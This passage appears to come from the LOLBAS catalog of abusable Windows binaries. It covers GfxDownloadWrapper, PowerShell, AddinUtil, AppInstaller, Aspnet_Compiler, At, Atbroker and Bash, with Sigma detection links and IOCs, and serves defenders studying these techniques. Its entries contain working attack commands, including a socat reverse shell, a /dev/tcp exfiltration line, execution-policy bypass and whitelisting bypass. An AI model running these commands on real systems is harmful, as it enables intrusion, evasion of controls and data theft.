  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\GfxDownloadWrapper.exe
  - Path: 
c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\GfxDownloadWrapper.exe - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\GfxDownloadWrapper.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. Resources: - Link: https://www.sothis.tech/author/jgalvez/ Acknowledgement: - Person: Jesus Galvez Handle: ================================================ FILE: yml/HonorableMentions/PowerShell.yml ================================================ --- Name: Powershell.exe Description: Powershell.exe is a a task-based command-line shell built on .NET. Author: 'Everyone' Created: 2024-04-03 Commands: - Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1 Description: Set the execution policy to bypass and execute a PowerShell script without warning Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires Category: Execute Privileges: User MitreID: T1059.001 OperatingSystem: Windows 7 and up - Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..." 
Description: Set the execution policy to bypass and execute a PowerShell command Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires Category: Execute Privileges: User MitreID: T1059.001 OperatingSystem: Windows 7 and up - Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA== Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires Category: Execute Privileges: User MitreID: T1059.001 OperatingSystem: Windows 7 and up Full_Path: - Path: 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe' - Path: 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' Detection: - Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell Resources: - Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1 - Link: https://attack.mitre.org/techniques/T1059/001/ Acknowledgement: - Person: Everyone Handle: '@alltheoffensivecyberers' ================================================ FILE: yml/OSBinaries/Addinutil.yml ================================================ --- Name: AddinUtil.exe Description: .NET Tool used for updating cache files for Microsoft Office Add-Ins. Author: 'Michael McKinley @MckinleyMike' Created: 2023-10-05 Commands: - Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:. Description: AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload. 
Usecase: Proxy execution of malicious serialized payload Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\AddInUtil.exe Code_Sample: - Code: https://gist.github.com/SILJAEUROPA/a850d476179d73df230a876944e9f3b1#file-addins-store Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml Resources: - Link: https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html Acknowledgement: - Person: Michael McKinley Handle: '@MckinleyMike' - Person: Tony Latteri Handle: '@TheLatteri' ================================================ FILE: yml/OSBinaries/AppInstaller.yml ================================================ --- Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' Created: 2020-12-02 Commands: - Command: start ms-appinstaller://?source={REMOTEURL:.exe} Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache. 
Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml Resources: - Link: https://twitter.com/notwhickey/status/1333900137232523264 Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ================================================ FILE: yml/OSBinaries/Aspnet_Compiler.yml ================================================ --- Name: Aspnet_Compiler.exe Description: ASP.NET Compilation Tool Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u Description: Execute C# code with the Build Provider and proper folder structure in place. 
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code_Sample: - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml Resources: - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 Acknowledgement: - Person: cpl Handle: '@cpl3h' ================================================ FILE: yml/OSBinaries/At.yml ================================================ --- Name: At.exe Description: Schedule periodic tasks Author: 'Freddie Barr-Smith' Created: 2019-09-20 Commands: - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD} Description: Create a recurring task to execute every day at a specific time. Usecase: Create a recurring task, to eg. 
to keep reverse shell session(s) alive Category: Execute Privileges: Local Admin MitreID: T1053.002 OperatingSystem: Windows 7 or older Tags: - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/builtin/security/win_security_atsvc_task.yml - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) - IOC: C:\Windows\Tasks\At1.job - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. Resources: - Link: https://freddiebarrsmith.com/at.txt - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems Acknowledgement: - Person: 'Freddie Barr-Smith' Handle: - Person: 'Riccardo Spolaor' Handle: - Person: 'Mariano Graziano' Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ================================================ FILE: yml/OSBinaries/Atbroker.yml ================================================ --- Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry. 
Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ Acknowledgement: - Person: Adam Handle: '@hexacorn' ================================================ FILE: yml/OSBinaries/Bash.yml ================================================ --- Name: Bash.exe Description: File used by Windows subsystem for Linux Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: bash.exe -c "{CMD}" Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverse shell Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. 
Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe -c "{CMD}" Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Category: AWL Bypass Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe Description: When executed, `bash.exe` queries the registry value of `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a folder path (`c:\program files\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder. Usecase: Execute a payload as a child process of `bash.exe` while masquerading as WSL. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: 